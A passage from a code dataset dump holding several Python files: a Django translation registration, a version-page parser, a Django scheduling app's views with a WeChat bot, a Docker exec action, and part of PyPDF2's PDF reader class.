'text5',)\n\n\n# class GalleryTranslationOptions(TranslationOptions):\n# fields = ('text',)\n#\n#\n# class ImagesTranslationOptions(TranslationOptions):\n# fields = ('image_text',)\n\ntranslator.register(Menu, MenuTranslationOptions)\ntranslator.register(Slider, SliderTranslationOptions)\ntranslator.register(SubMenu, SubMenuTranslationOptions)\ntranslator.register(Context, ContextTranslationOptions)\ntranslator.register(Personal, PersonalTranslationOptions)\ntranslator.register(ArticleContext, ArticleContextTranslationOptions)\n# translator.register(Gallery, GalleryTranslationOptions)\n# translator.register(Images, ImagesTranslationOptions)\n","sub_path":"mainapp/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"274719704","text":"\"\"\"\"\"\"\n\n# Standard library modules.\nimport re\nfrom distutils.version import LooseVersion\n\n# Third party modules.\nfrom bs4 import BeautifulSoup\n\n# Local modules.\nfrom pymontecarlo_debian.core.versionparser import \\\n WebpageVersionParser, PackageCloudVersionParser\n\n# Globals and constants variables.\n\nWEBPAGE_URL = 'http://montecarlomodeling.mcgill.ca/download/download.html'\n\nclass MCXrayWebpageVersionParser(WebpageVersionParser):\n\n PATTERN = r'MCXRayLite_v([0-9.]*).zip$'\n\n def __init__(self):\n super().__init__(WEBPAGE_URL)\n\n def _parse_webpage(self, content):\n soup = BeautifulSoup(content, \"html.parser\")\n\n versions = []\n for a in soup.find_all('a'):\n match = re.match(self.PATTERN, a['href'])\n if not match:\n continue\n\n version = LooseVersion(match.group(1))\n\n versions.append(version)\n\n if not versions:\n return None\n\n return max(versions)\n\nclass MCXrayPackageCloudVersionParser(PackageCloudVersionParser):\n\n def __init__(self, api_token):\n super().__init__(api_token, 'ppinard', 'pymontecarlo', 'mcxray-lite')\n","sub_path":"pymontecarlo_debian/mcxray/versionparser.py","file_name":"versionparser.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"395832776","text":"from django.shortcuts import render, redirect, reverse\nfrom User.dataoper import *\nfrom Schedule.models import *\nfrom django.contrib.auth.decorators import login_required\nimport datetime\nimport schedule\nimport time\nimport threading\n# Create your views here.\nfrom django.http import HttpResponse\n\nimport itchat\nfrom itchat.content import TEXT\nfrom itchat import send\nimport json\n\n\ndef index(request):\n return render(request, 'User/index.html')\n\n\ndef login_view(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n if request.GET.get('next', '') == '':\n return redirect('userprofile', username=username)\n else:\n return redirect(request.GET.get('next', ''))\n return render(request, 'User/login.html', {'Logstatus': 'False'})\n else:\n return render(request, 'User/login.html')\n\n\ndef register(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n email = request.POST.get('email')\n res = create_user(username, password, email)\n if res is not None:\n return redirect('userprofile', username=username)\n else:\n return render(request, 'User/register.html', {'Regstatus': 'False'})\n else:\n return render(request, 'User/register.html')\n\n\n@login_required\ndef userprofile(request, username):\n if username != request.user.username:\n return redirect('userprofile', username=request.user.username)\n if request.method == 'GET':\n user_sche = Schedule.objects.filter(creator=request.user)\n unitlist = schedule_list_to_dict(user_sche)\n part_data = add_participate_unit(ScheduleParticipator.objects.filter(participator=request.user))\n if len(part_data['itemlist']) > 0:\n unitlist.append(part_data)\n return render(request, 'User/userprofile.html', {'unitlist': unitlist, 'username': request.user.username})\n elif request.method == 'POST':\n oper = request.POST.get('operation')\n pk = request.POST.get('pk')\n if oper == 'Delete':\n if Schedule.objects.get(pk=pk).creator == request.user:\n part_list = ScheduleParticipator.objects.filter(schedule=Schedule.objects.get(pk=pk))\n for i in part_list:\n i.delete()\n Schedule.objects.get(pk=pk).delete()\n else:\n ScheduleParticipator.objects.get(participator=GyroUser.objects.get(username=request.user.username),\n schedule=Schedule.objects.get(pk=pk)).delete()\n return redirect('userprofile', username=request.user.username)\n\n\ndef scheduleprofile(request, schedulepk):\n if request.method == 'GET':\n obj_sche = Schedule.objects.get(pk=schedulepk)\n context = {'title': obj_sche.title, 'desc': obj_sche.description, 'notify_time_day': obj_sche.notify_time.days,\n 'start_time': obj_sche.start_time,\n 'end_time': obj_sche.end_time, 'participator_count': obj_sche.participator_count,\n 'type': obj_sche.type}\n return render(request, 'User/new_schedule.html', context)\n elif request.method == 'POST':\n oper = request.POST.get('operation')\n pk = request.POST.get('pk')\n if oper == 'Delete':\n Schedule.objects.get(pk=pk).delete()\n return redirect('userprofile', username=request.user.username)\n elif oper == 'Update':\n title = request.POST.get('title')\n desc = request.POST.get('description')\n notify_time = datetime.timedelta(days=int(request.POST.get('notify_day')),hours=int(request.POST.get('notify_hour')))\n start_time = request.POST.get('start_time')\n end_time = request.POST.get('end_time')\n creator = request.user\n type = ScheduleType.objects.get_or_create(type_name=request.POST.get('type_name'))\n sche=Schedule.objects.get(pk=pk)\n sche.title=title\n sche.description = desc\n sche.title = title\n sche.notify_time=notify_time\n sche.start_time=start_time\n sche.end_time=end_time\n sche.type=type\n sche.save()\n return redirect('userprofile', username=request.user.username)\n\n\ndef create_schedule(request, username):\n if request.method == 'GET':\n return render(request, 'User/new_schedule.html')\n else:\n title = request.POST.get('title')\n desc = request.POST.get('description')\n notify_time = datetime.timedelta(days=int(request.POST.get('notify_day')),\n hours=int(request.POST.get('notify_hour')))\n start_time = request.POST.get('start_time')\n end_time = request.POST.get('end_time')\n creator = request.user\n type = ScheduleType.objects.create(type_name=request.POST.get('type_name'))\n Schedule.objects.create(title=title, description=desc, notify_time=notify_time,\n start_time=start_time,\n end_time=end_time, creator=creator, type=type)\n return redirect('userprofile', username=username)\n\n\n@login_required\ndef login_out(request):\n logout(request)\n return redirect('index')\n\n\ndef setting(request, username):\n if request.method == 'GET':\n context = {'username': request.user.username, 'gender': 'Male' if request.user.gender is True else 'Female',\n 'birthday': request.user.birthday}\n return render(request, 'User/setting.html', context)\n else:\n username = request.POST.get('username')\n password = request.POST.get('password')\n gender = request.POST.get('gender')\n birthday = request.POST.get('birthday')\n userobj = GyroUser.objects.get(username=request.user.username)\n if password != '':\n userobj.set_password(password)\n userobj.gender = gender\n userobj.birthday = birthday\n userobj.save()\n context = {'username': request.user.username, 'gender': 'Male' if gender is True else 'Female',\n 'birthday': birthday}\n return render(request, 'User/setting.html', context)\n\n\n@login_required\ndef search(request):\n if request.method == 'GET':\n searchdata = request.GET.get('q', '')\n if searchdata == '':\n datalist = Schedule.objects.all()\n unitlist = schedule_list_to_dict(datalist)\n return render(request, 'User/search.html', {'unitlist': unitlist, 'username': request.user.username})\n else:\n datalist = Schedule.objects.filter(title__contains=searchdata)\n unitlist = schedule_list_to_dict(datalist)\n return render(request, 'User/search.html', {'unitlist': unitlist, 'username': request.user.username})\n elif request.method == 'POST':\n oper = request.POST.get('operation')\n pk = request.POST.get('pk')\n if oper == 'Add':\n ScheduleParticipator.objects.create(schedule=Schedule.objects.get(pk=pk),\n participator=GyroUser.objects.get(username=request.user.username))\n return redirect('userprofile', username=request.user.username)\n return render(request, 'User/search.html')\n\n\ndef schedule_view(request, schedule_pk):\n print(schedule_pk)\n sche_obj = Schedule.objects.get(pk=schedule_pk)\n if request.method == 'GET':\n title = sche_obj.title\n desc = sche_obj.description\n notify_day = sche_obj.notify_time.days\n start_time = sche_obj.start_time\n end_time = sche_obj.end_time\n creator = request.user.username\n type = sche_obj.type.type_name\n context = {'title': title, 'desc': desc, 'notify_day': notify_day,\n 'start_time': start_time, 'end_time': end_time, 'creator': creator, 'type': type}\n return render(request, 'User/scheduleprofile.html', context)\n else:\n oper = request.POST.get('operation')\n if oper == 'Delete':\n tmp = ScheduleParticipator.objects.filter(schedule=Schedule.objects.get(pk=schedule_pk))\n for i in tmp:\n i.delete()\n Schedule.objects.get(pk=schedule_pk).delete()\n return redirect('userprofile', username=request.user.username)\n elif oper == 'Update':\n title = request.POST.get('title')\n desc = request.POST.get('description')\n notify_time = datetime.timedelta(days=int(request.POST.get('notify_day')),\n hours=int(request.POST.get('notify_hour')))\n start_time = request.POST.get('start_time')\n end_time = request.POST.get('end_time')\n creator = request.user\n type = ScheduleType.objects.create(type_name=request.POST.get('type_name'))\n sche = Schedule.objects.get(pk=schedule_pk)\n sche.title = title\n sche.description = desc\n sche.title = title\n sche.notify_time = notify_time\n sche.start_time = start_time\n sche.end_time = end_time\n sche.type = type\n sche.save()\n return redirect('userprofile', username=request.user.username)\n\n\ndef wechat_module():\n itchat_user_dict = {}\n itchat_user_dict_reverse = {}\n itchat.auto_login(hotReload=False)\n client = itchat.search_friends(nickName='一个亿')[0]['UserName']\n a = itchat.search_friends(nickName='一个亿')\n\n @itchat.msg_register(TEXT)\n def text_reply(msg):\n print(msg['FromUserName'])\n if msg['FromUserName'] == client:\n msgdata = json.loads(msg['Text'])\n res = {}\n if msgdata['MessageType'] == 1:\n res['MessageType'] = 1\n res['ToUserName'] = msgdata['FromUserName']\n if authenticate(msgdata['User'], msgdata['Password']):\n res['AuthenticationResult'] = True\n itchat_user_dict[msgdata['FromUserName']] = msgdata['User']\n itchat_user_dict_reverse[msgdata['User']] = msgdata['FromUserName']\n else:\n res['AuthenticationResult'] = False\n print(\"Msg to client\")\n print(res)\n send(json.dumps(res), client)\n print(itchat_user_dict)\n elif msgdata['MessageType'] == 2:\n res['MessageType'] = 2\n res['Message'] = \"\"\n res['ToUserName'] = msgdata['FromUserName']\n username = itchat_user_dict[msgdata['FromUserName']]\n user_sche = Schedule.objects.filter(creator=GyroUser.objects.get(username=username))\n unitlist = schedule_list_to_dict(user_sche)\n part_data = add_participate_unit(\n ScheduleParticipator.objects.filter(participator=GyroUser.objects.get(username=username)))\n if len(part_data['itemlist']) > 0:\n unitlist.append(part_data)\n for unit in unitlist:\n res['Message'] += unit['title'] + ':'\n for item in unit['itemlist']:\n res['Message'] += item['title'] + ','\n print(\"Msg to client\")\n print(res)\n send(json.dumps(res), msg['FromUserName'])\n\n def job():\n while True:\n print(\"Gyro Wechat server is working\")\n date_now = datetime.datetime.now().timestamp()\n sche_all = Schedule.objects.all()\n for sche in sche_all:\n if date_now >= (sche.end_time - sche.notify_time).timestamp():\n print('Delete', sche.title, sche.pk)\n res = {'MessageType': 2}\n try:\n res['ToUserName'] = itchat_user_dict_reverse[sche.creator.username]\n except:\n tmp = ScheduleParticipator.objects.filter(schedule=sche)\n for i in tmp:\n i.delete()\n sche.delete()\n continue\n res['Message'] = '任务提醒:' + sche.title\n print(\"Msg to client\")\n print(res)\n send(json.dumps(res), client)\n tmp = ScheduleParticipator.objects.filter(schedule=sche)\n for i in tmp:\n i.delete()\n sche.delete()\n time.sleep(10)\n\n def mytime():\n itchat.run()\n\n t = threading.Thread(target=job, name='it')\n v = threading.Thread(target=mytime, name='it1')\n v.start()\n t.start()\n\n#wechat_module()","sub_path":"User/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9027100","text":"from lib.base import DockerBasePythonAction\n\n\n__all__ = [\n 'DockerExecAction'\n]\n\n\nclass DockerExecAction(DockerBasePythonAction):\n def run(self, *args, **kwargs):\n detach = kwargs.pop('detach')\n execution = self.client.exec_create(*args, **kwargs)\n return self.client.exec_start(exec_id=execution.get('Id'), detach=detach)\n","sub_path":"actions/exec.py","file_name":"exec.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"171325444","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2006, Mathieu Fenniak\n# Copyright (c) 2007, Ashish Kulkarni \n#\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * The name of the author may not be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nimport struct\nimport sys\nimport warnings\nfrom hashlib import md5\nfrom sys import version_info\n\nfrom PyPDF2 import utils\nfrom PyPDF2._page import PageObject\nfrom PyPDF2._security import _alg33_1, _alg34, _alg35\nfrom PyPDF2.constants import CatalogAttributes as CA\nfrom PyPDF2.constants import Core as CO\nfrom PyPDF2.constants import DocumentInformationAttributes as DI\nfrom PyPDF2.constants import EncryptionDictAttributes as ED\nfrom PyPDF2.constants import PageAttributes as PG\nfrom PyPDF2.constants import PagesAttributes as PA\nfrom PyPDF2.constants import StreamAttributes as SA\nfrom PyPDF2.constants import TrailerKeys as TK\nfrom PyPDF2.errors import PdfReadError, PdfReadWarning, PdfStreamError\nfrom PyPDF2.generic import (\n ArrayObject,\n BooleanObject,\n ByteStringObject,\n Destination,\n DictionaryObject,\n Field,\n IndirectObject,\n NameObject,\n NullObject,\n NumberObject,\n StreamObject,\n TextStringObject,\n createStringObject,\n readNonWhitespace,\n readObject,\n)\nfrom PyPDF2.utils import (\n ConvertFunctionsToVirtualList,\n b_,\n formatWarning,\n isString,\n readUntilWhitespace,\n)\n\nif version_info < (3, 0):\n from cStringIO import StringIO\n\n BytesIO = StringIO\nelse:\n from io import BytesIO, StringIO\n\n\ndef convertToInt(d, size):\n if size > 8:\n raise PdfReadError(\"invalid size in convertToInt\")\n d = b_(\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\") + b_(d)\n d = d[-8:]\n return struct.unpack(\">q\", d)[0]\n\n\nclass DocumentInformation(DictionaryObject):\n \"\"\"\n A class representing the basic document metadata provided in a PDF File.\n This class is accessible through\n :meth:`.getDocumentInfo()`\n\n All text properties of the document metadata have\n *two* properties, eg. author and author_raw. The non-raw property will\n always return a ``TextStringObject``, making it ideal for a case where\n the metadata is being displayed. The raw property can sometimes return\n a ``ByteStringObject``, if PyPDF2 was unable to decode the string's\n text encoding; this requires additional safety in the caller and\n therefore is not as commonly accessed.\n \"\"\"\n\n def __init__(self):\n DictionaryObject.__init__(self)\n\n def getText(self, key):\n retval = self.get(key, None)\n if isinstance(retval, TextStringObject):\n return retval\n return None\n\n @property\n def title(self):\n \"\"\"Read-only property accessing the document's **title**.\n Returns a unicode string (``TextStringObject``) or ``None``\n if the title is not specified.\"\"\"\n return (\n self.getText(DI.TITLE) or self.get(DI.TITLE).getObject()\n if self.get(DI.TITLE)\n else None\n )\n\n @property\n def title_raw(self):\n \"\"\"The \"raw\" version of title; can return a ``ByteStringObject``.\"\"\"\n return self.get(DI.TITLE)\n\n @property\n def author(self):\n \"\"\"Read-only property accessing the document's **author**.\n Returns a unicode string (``TextStringObject``) or ``None``\n if the author is not specified.\"\"\"\n return self.getText(DI.AUTHOR)\n\n @property\n def author_raw(self):\n \"\"\"The \"raw\" version of author; can return a ``ByteStringObject``.\"\"\"\n return self.get(DI.AUTHOR)\n\n @property\n def subject(self):\n \"\"\"Read-only property accessing the document's **subject**.\n Returns a unicode string (``TextStringObject``) or ``None``\n if the subject is not specified.\"\"\"\n return self.getText(DI.SUBJECT)\n\n @property\n def subject_raw(self):\n \"\"\"The \"raw\" version of subject; can return a ``ByteStringObject``.\"\"\"\n return self.get(DI.SUBJECT)\n\n @property\n def creator(self):\n \"\"\"Read-only property accessing the document's **creator**. If the\n document was converted to PDF from another format, this is the name of the\n application (e.g. OpenOffice) that created the original document from\n which it was converted. Returns a unicode string (``TextStringObject``)\n or ``None`` if the creator is not specified.\"\"\"\n return self.getText(DI.CREATOR)\n\n @property\n def creator_raw(self):\n \"\"\"The \"raw\" version of creator; can return a ``ByteStringObject``.\"\"\"\n return self.get(DI.CREATOR)\n\n @property\n def producer(self):\n \"\"\"Read-only property accessing the document's **producer**.\n If the document was converted to PDF from another format, this is\n the name of the application (for example, OSX Quartz) that converted\n it to PDF. Returns a unicode string (``TextStringObject``)\n or ``None`` if the producer is not specified.\"\"\"\n return self.getText(DI.PRODUCER)\n\n @property\n def producer_raw(self):\n \"\"\"The \"raw\" version of producer; can return a ``ByteStringObject``.\"\"\"\n return self.get(DI.PRODUCER)\n\n\nclass PdfFileReader(object):\n \"\"\"\n Initialize a PdfFileReader object.\n\n This operation can take some time, as the PDF stream's cross-reference\n tables are read into memory.\n\n :param stream: A File object or an object that supports the standard read\n and seek methods similar to a File object. Could also be a\n string representing a path to a PDF file.\n :param bool strict: Determines whether user should be warned of all\n problems and also causes some correctable problems to be fatal.\n Defaults to ``True``.\n :param warndest: Destination for logging warnings (defaults to\n ``sys.stderr``).\n :param bool overwriteWarnings: Determines whether to override Python's\n ``warnings.py`` module with a custom implementation (defaults to\n ``True``).\n \"\"\"\n\n def __init__(self, stream, strict=True, warndest=None, overwriteWarnings=True):\n if overwriteWarnings:\n # Have to dynamically override the default showwarning since there\n # are no public methods that specify the 'file' parameter\n def _showwarning(\n message, category, filename, lineno, file=warndest, line=None\n ):\n if file is None:\n file = sys.stderr\n try:\n # It is possible for sys.stderr to be defined as None, most commonly in the case that the script\n # is being run vida pythonw.exe on Windows. In this case, just swallow the warning.\n # See also https://docs.python.org/3/library/sys.html# sys.__stderr__\n if file is not None:\n file.write(\n formatWarning(message, category, filename, lineno, line)\n )\n except IOError:\n pass\n\n warnings.showwarning = _showwarning\n self.strict = strict\n self.flattenedPages = None\n self.resolvedObjects = {}\n self.xrefIndex = 0\n self._pageId2Num = None # map page IndirectRef number to Page Number\n if hasattr(stream, \"mode\") and \"b\" not in stream.mode:\n warnings.warn(\n \"PdfFileReader stream/file object is not in binary mode. \"\n \"It may not be read correctly.\",\n PdfReadWarning,\n )\n if isString(stream):\n with open(stream, \"rb\") as fileobj:\n stream = BytesIO(b_(fileobj.read()))\n self.read(stream)\n self.stream = stream\n\n self._override_encryption = False\n\n def getDocumentInfo(self):\n \"\"\"\n Retrieve the PDF file's document information dictionary, if it exists.\n Note that some PDF files use metadata streams instead of docinfo\n dictionaries, and these metadata streams will not be accessed by this\n function.\n\n :return: the document information of this PDF file\n :rtype: :class:`DocumentInformation` or\n ``None`` if none exists.\n \"\"\"\n if TK.INFO not in self.trailer:\n return None\n obj = self.trailer[TK.INFO]\n retval = DocumentInformation()\n retval.update(obj)\n return retval\n\n @property\n def documentInfo(self):\n \"\"\"\n Read-only property that accesses the\n :meth:`getDocumentInfo()` function.\n \"\"\"\n return self.getDocumentInfo()\n\n def getXmpMetadata(self):\n \"\"\"\n Retrieve XMP (Extensible Metadata Platform) data from the PDF document\n root.\n\n :return: a :class:`XmpInformation`\n instance that can be used to access XMP metadata from the document.\n :rtype: :class:`XmpInformation` or\n ``None`` if no metadata was found on the document root.\n \"\"\"\n try:\n self._override_encryption = True\n return self.trailer[TK.ROOT].getXmpMetadata()\n finally:\n self._override_encryption = False\n\n @property\n def xmpMetadata(self):\n \"\"\"\n Read-only property that accesses the\n :meth:`getXmpMetadata()` function.\n \"\"\"\n return self.getXmpMetadata()\n\n def getNumPages(self):\n \"\"\"\n Calculates the number of pages in this PDF file.\n\n :return: number of pages\n :rtype: int\n :raises PdfReadError: if file is encrypted and restrictions prevent\n this action.\n \"\"\"\n\n # Flattened pages will not work on an Encrypted PDF;\n # the PDF file's page count is used in this case. Otherwise,\n # the original method (flattened page count) is used.\n if self.isEncrypted:\n try:\n self._override_encryption = True\n self.decrypt(\"\")\n return self.trailer[TK.ROOT][\"/Pages\"][\"/Count\"]\n except Exception:\n raise PdfReadError(\"File has not been decrypted\")\n finally:\n self._override_encryption = False\n else:\n if self.flattenedPages is None:\n self._flatten()\n return len(self.flattenedPages)\n\n @property\n def numPages(self):\n \"\"\"\n Read-only property that accesses the\n :meth:`getNumPages()` function.\n \"\"\"\n return self.getNumPages()\n\n def getPage(self, pageNumber):\n \"\"\"\n Retrieves a page by number from this PDF file.\n\n :param int pageNumber: The page number to retrieve\n (pages begin at zero)\n :return: a :class:`PageObject` instance.\n :rtype: :class:`PageObject`\n \"\"\"\n # ensure that we're not trying to access an encrypted PDF\n # assert not self.trailer.has_key(TK.ENCRYPT)\n if self.flattenedPages is None:\n self._flatten()\n return self.flattenedPages[pageNumber]\n\n @property\n def namedDestinations(self):\n \"\"\"\n Read-only property that accesses the\n :meth:`getNamedDestinations()` function.\n \"\"\"\n return self.getNamedDestinations()\n\n # A select group of relevant field attributes. For the complete list,\n # see section 8.6.2 of the PDF 1.7 reference.\n\n def getFields(self, tree=None, retval=None, fileobj=None):\n \"\"\"\n Extracts field data if this PDF contains interactive form fields.\n The *tree* and *retval* parameters are for recursive use.\n\n :param fileobj: A file object (usually a text file) to write\n a report to on all interactive form fields found.\n :return: A dictionary where each key is a field name, and each\n value is a :class:`Field` object. By\n default, the mapping name is used for keys.\n :rtype: dict, or ``None`` if form data could not be located.\n \"\"\"\n field_attributes = {\n \"/FT\": \"Field Type\",\n PA.PARENT: \"Parent\",\n \"/T\": \"Field Name\",\n \"/TU\": \"Alternate Field Name\",\n \"/TM\": \"Mapping Name\",\n \"/Ff\": \"Field Flags\",\n \"/V\": \"Value\",\n \"/DV\": \"Default Value\",\n }\n if retval is None:\n retval = {}\n catalog = self.trailer[TK.ROOT]\n # get the AcroForm tree\n if \"/AcroForm\" in catalog:\n tree = catalog[\"/AcroForm\"]\n else:\n return None\n if tree is None:\n return retval\n\n self._checkKids(tree, retval, fileobj)\n for attr in field_attributes:\n if attr in tree:\n # Tree is a field\n self._buildField(tree, retval, fileobj, field_attributes)\n break\n\n if \"/Fields\" in tree:\n fields = tree[\"/Fields\"]\n for f in fields:\n field = f.getObject()\n self._buildField(field, retval, fileobj, field_attributes)\n\n return retval\n\n def _buildField(self, field, retval, fileobj, fieldAttributes):\n self._checkKids(field, retval, fileobj)\n try:\n key = field[\"/TM\"]\n except KeyError:\n try:\n key = field[\"/T\"]\n except KeyError:\n # Ignore no-name field for now\n return\n if fileobj:\n self._writeField(fileobj, field, fieldAttributes)\n fileobj.write(\"\\n\")\n retval[key] = Field(field)\n\n def _checkKids(self, tree, retval, fileobj):\n if PA.KIDS in tree:\n # recurse down the tree\n for kid in tree[PA.KIDS]:\n self.getFields(kid.getObject(), retval, fileobj)\n\n def _writeField(self, fileobj, field, fieldAttributes):\n order = [\"/TM\", \"/T\", \"/FT\", PA.PARENT, \"/TU\", \"/Ff\", \"/V\", \"/DV\"]\n for attr in order:\n attr_name = fieldAttributes[attr]\n try:\n if attr == \"/FT\":\n # Make the field type value more clear\n types = {\n \"/Btn\": \"Button\",\n \"/Tx\": \"Text\",\n \"/Ch\": \"Choice\",\n \"/Sig\": \"Signature\",\n }\n if field[attr] in types:\n fileobj.write(attr_name + \": \" + types[field[attr]] + \"\\n\")\n elif attr == PA.PARENT:\n # Let's just write the name of the parent\n try:\n name = field[PA.PARENT][\"/TM\"]\n except KeyError:\n name = field[PA.PARENT][\"/T\"]\n fileobj.write(attr_name + \": \" + name + \"\\n\")\n else:\n fileobj.write(attr_name + \": \" + str(field[attr]) + \"\\n\")\n except KeyError:\n # Field attribute is N/A or unknown, so don't write anything\n pass\n\n def getFormTextFields(self):\n \"\"\"Retrieves form fields from the document with textual data (inputs, dropdowns)\"\"\"\n # Retrieve document form fields\n formfields = self.getFields()\n if formfields is None:\n return {}\n return {\n formfields[field][\"/T\"]: formfields[field].get(\"/V\")\n for field in formfields\n if formfields[field].get(\"/FT\") == \"/Tx\"\n }\n\n def getNamedDestinations(self, tree=None, retval=None):\n \"\"\"\n Retrieves the named destinations present in the document.\n\n :return: a dictionary which maps names to\n :class:`Destinations`.\n :rtype: dict\n \"\"\"\n if retval is None:\n retval = {}\n catalog = self.trailer[TK.ROOT]\n\n # get the name tree\n if CA.DESTS in catalog:\n tree = catalog[CA.DESTS]\n elif CA.NAMES in catalog:\n names = catalog[CA.NAMES]\n if CA.DESTS in names:\n tree = names[CA.DESTS]\n\n if tree is None:\n return retval\n\n if PA.KIDS in tree:\n # recurse down the tree\n for kid in tree[PA.KIDS]:\n self.getNamedDestinations(kid.getObject(), retval)\n\n if CA.NAMES in tree:\n names = tree[CA.NAMES]\n for i in range(0, len(names), 2):\n key = names[i].getObject()\n val = names[i + 1].getObject()\n if isinstance(val, DictionaryObject) and \"/D\" in val:\n val = val[\"/D\"]\n dest = self._buildDestination(key, val)\n if dest is not None:\n retval[key] = dest\n\n return retval\n\n @property\n def outlines(self):\n \"\"\"\n Read-only property that accesses the\n :meth:`getOutlines()` function.\n \"\"\"\n return self.getOutlines()\n\n def getOutlines(self, node=None, outlines=None):\n \"\"\"\n Retrieve the document outline present in the document.\n\n :return: a nested list of :class:`Destinations`.\n \"\"\"\n if outlines is None:\n outlines = []\n catalog = self.trailer[TK.ROOT]\n\n # get the outline dictionary and named destinations\n if CO.OUTLINES in catalog:\n try:\n lines = catalog[CO.OUTLINES]\n except PdfReadError:\n # this occurs if the /Outlines object reference is incorrect\n # for an example of such a file, see https://unglueit-files.s3.amazonaws.com/ebf/7552c42e9280b4476e59e77acc0bc812.pdf\n # so continue to load the file without the Bookmarks\n return outlines\n\n if \"/First\" in lines:\n node = lines[\"/First\"]\n self._namedDests = self.getNamedDestinations()\n\n if node is None:\n return outlines\n\n # see if there are any more outlines\n while True:\n outline = self._buildOutline(node)\n if outline:\n outlines.append(outline)\n\n # check for sub-outlines\n if \"/First\" in node:\n sub_outlines = []\n self.getOutlines(node[\"/First\"], sub_outlines)\n if sub_outlines:\n outlines.append(sub_outlines)\n\n if \"/Next\" not in node:\n break\n node = node[\"/Next\"]\n\n return outlines\n\n def _getPageNumberByIndirect(self, indirectRef):\n \"\"\"Generate _pageId2Num\"\"\"\n if self._pageId2Num is None:\n id2num = {}\n for i, x in enumerate(self.pages):\n id2num[x.indirectRef.idnum] = i\n self._pageId2Num = id2num\n\n if isinstance(indirectRef, NullObject):\n return -1\n if isinstance(indirectRef, int):\n idnum = indirectRef\n else:\n idnum = indirectRef.idnum\n\n ret = self._pageId2Num.get(idnum, -1)\n return ret\n\n def getPageNumber(self, page):\n \"\"\"\n Retrieve page number of a given PageObject\n\n :param PageObject page: The page to get page number. Should be\n an instance of :class:`PageObject`\n :return: the page number or -1 if page not found\n :rtype: int\n \"\"\"\n indirect_ref = page.indirectRef\n ret = self._getPageNumberByIndirect(indirect_ref)\n return ret\n\n def getDestinationPageNumber(self, destination):\n \"\"\"\n Retrieve page number of a given Destination object\n\n :param Destination destination: The destination to get page number.\n Should be an instance of\n :class:`Destination`\n :return: the page number or -1 if page not found\n :rtype: int\n \"\"\"\n indirect_ref = destination.page\n ret = self._getPageNumberByIndirect(indirect_ref)\n return ret\n\n def _buildDestination(self, title, array):\n page, typ = array[0:2]\n array = array[2:]\n try:\n return Destination(title, page, typ, *array)\n except PdfReadError:\n warnings.warn(\"Unknown destination : \" + title + \" \" + str(array))\n if self.strict:\n raise\n else:\n # create a link to first Page\n return Destination(\n title, self.getPage(0).indirectRef, TextStringObject(\"/Fit\")\n )\n\n def _buildOutline(self, node):\n dest, title, outline = None, None, None\n\n if \"/A\" in node and \"/Title\" in node:\n # Action, section 8.5 (only type GoTo supported)\n title = node[\"/Title\"]\n action = node[\"/A\"]\n if action[\"/S\"] == \"/GoTo\":\n dest = action[\"/D\"]\n elif \"/Dest\" in node and \"/Title\" in node:\n # Destination, section 8.2.1\n title = node[\"/Title\"]\n dest = node[\"/Dest\"]\n\n # if destination found, then create outline\n if dest:\n if isinstance(dest, ArrayObject):\n outline = self._buildDestination(title, dest)\n elif isString(dest) and dest in self._namedDests:\n outline = self._namedDests[dest]\n outline[NameObject(\"/Title\")] = title\n else:\n raise PdfReadError(\"Unexpected destination %r\" % dest)\n return outline\n\n @property\n def pages(self):\n \"\"\"\n Read-only property that emulates a list based upon the\n :meth:`getNumPages()` and\n :meth:`getPage()` methods.\n \"\"\"\n return ConvertFunctionsToVirtualList(self.getNumPages, self.getPage)\n\n def getPageLayout(self):\n \"\"\"\n Get the page layout.\n\n See :meth:`setPageLayout()`\n for a description of valid layouts.\n\n :return: Page layout currently being used.\n :rtype: ``str``, ``None`` if not specified\n \"\"\"\n try:\n return self.trailer[TK.ROOT][\"/PageLayout\"]\n except KeyError:\n return None\n\n @property\n def pageLayout(self):\n \"\"\"Read-only property accessing the\n :meth:`getPageLayout()` method.\"\"\"\n return self.getPageLayout()\n\n def getPageMode(self):\n \"\"\"\n Get the page mode.\n See :meth:`setPageMode()`\n for a description of valid modes.\n\n :return: Page mode currently being used.\n :rtype: ``str``, ``None`` if not specified\n \"\"\"\n try:\n return 